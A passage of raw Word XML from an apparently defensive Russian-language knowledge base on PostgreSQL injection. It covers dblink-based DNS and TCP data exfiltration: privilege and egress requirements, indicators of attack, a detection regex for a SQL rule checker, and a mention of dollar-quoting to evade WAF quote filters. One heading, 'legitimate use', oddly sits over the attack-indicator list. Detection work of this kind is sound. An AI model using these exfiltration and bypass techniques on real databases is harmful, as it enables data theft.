          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ('OK'/ошибка), что совпадает с типом колонки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>email</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в исходном запросе.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612F8686" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7748BC23" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PG-версия:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 14–17 (поведение не менялось с 9.x).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6680E1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Расширение:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE EXTENSION dblink</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (NOT trusted → ставится только superuser-ом). После установки USAGE на функции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dblink_*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> по умолчанию выдан </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — application-роль вызывает свободно без дополнительных GRANT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436AFC73" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегии вызова:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PUBLIC после установки extension. Не требуется ни superuser, ни predefined-роль. Модель привилегий — см. раздел </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.2</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6390E7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Egress:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для DNS-канала достаточно UDP/53 наружу из PG-хоста (стандартно открыт); для TCP-канала — outbound TCP на порт listener-а атакующего (5432 или любой другой).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BAF8E9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SSL:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sslmode=require</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (дефолт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prefer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) startup-packet plaintext. Включение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sslmode=verify-full</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для outbound dblink не закрывает DNS-канал.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EBDA63" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Как выглядит легитимное использование.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E25D657" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dblink_connect(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>application-роли</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — легитимный dblink почти всегда из DBA/ETL-роли под отдельным сервис-аккаунтом, не из роли web-приложения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9CA14C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   conninfo, где </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>host=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> собран конкатенацией (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) с подзапросом или вызовом системной функции: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>current_user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>current_setting(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(SELECT ... FROM pg_*)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE4A458" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   В DNS-логах хоста БД: запросы к доменам с длинными hex-подобными labels (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[0-9a-f]{30,60}</w:t>
      </w:r>
      <w:r>
        <w:t>) в позиции subdomain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4181A59A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Короткоживущие TCP-коннекты с хоста БД на внешние адреса на нестандартные порты, инициатор PID = backend postgres (видно через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ss -tnp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_activity</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> по PID).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BAD26C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Резкий рост ошибок </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>could not establish connection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в PostgreSQL log от backend-процессов в окне атаки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B274C09" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9C9DBA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Работает на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 9.x – 17</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> включительно; поведение dblink не изменено в 17. Расширение dblink не помечено как deprecated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5BEC11" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на AWS RDS dblink доступен (preinstalled в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rds_superuser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), но egress TCP/DNS ограничен security group; на Google Cloud SQL — не входит в whitelist extensions; на Supabase — отключён по умолчанию, включается owner-ом проекта. Детальный разбор по провайдерам — см. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.9</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7C3FFC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AF9178" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres_fdw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как параллельный SSRF/OOB-канал с другой моделью привилегий (требует USAGE на FDW, дефолтно superuser-only).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346C8A3A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6.3, 3.6.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — file-read через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_server_files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lo_import</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как альтернативный OOB-вектор.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FFA08C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — dollar-quoting (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$tag$...$tag$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) для обхода фильтра одинарной кавычки в conninfo, когда WAF блокирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BEEDA7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — extension scripts как ступень эскалации, если в кластере удаётся подменить определение dblink.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB014DB"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dblink_connect</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dblink_exec</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dblink(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>app/services/judge/rules.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> нет. Ближайший по структуре существующий класс — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TIME_BASED_BLIND_INJECTION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (regex по конкретным опасным PG-функциям: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WAITFOR DELAY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BENCHMARK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Расширять его не следует — у OOB-эксфильтрации другая семантика и другой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>suggested_fix</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Рекомендация:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> добавить новый enum-вариант </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OOB_EXFILTRATION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VulnerabilityClass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>app/schemas/sql.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) и regex-ветку в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rules.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> по тому же шаблону, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TIME_BASED_BLIND_INJECTION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — паттерн </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\b(dblink_connect|dblink_exec|dblink)\s*\(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> плюс создание </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VulnerabilityFinding</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с базовым риском 9.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341CF2B2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55976809" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: dblink</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7F0527" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: dblink_connect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF56184" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: libpq Connection Functions — PQconnectdb / startup-packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AACF36" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>HackTricks: PostgreSQL Injection — dblink/lo_import data exfiltration</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — R1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADBFE51" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PDKT-Team CTF writeup: fbctf2019 hr-admin-module — dblink DNS exfil</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — R1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B85001" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PortSwigger Web Security Academy: SQL injection cheat sheet — PostgreSQL section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE20376" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>RFC 1035, §2.3.1: Preferred name syntax — label charset &amp; length limit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62ABC28C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.6.2 postgres_fdw — SSRF и DNS-эксфильтрация</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72535849" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
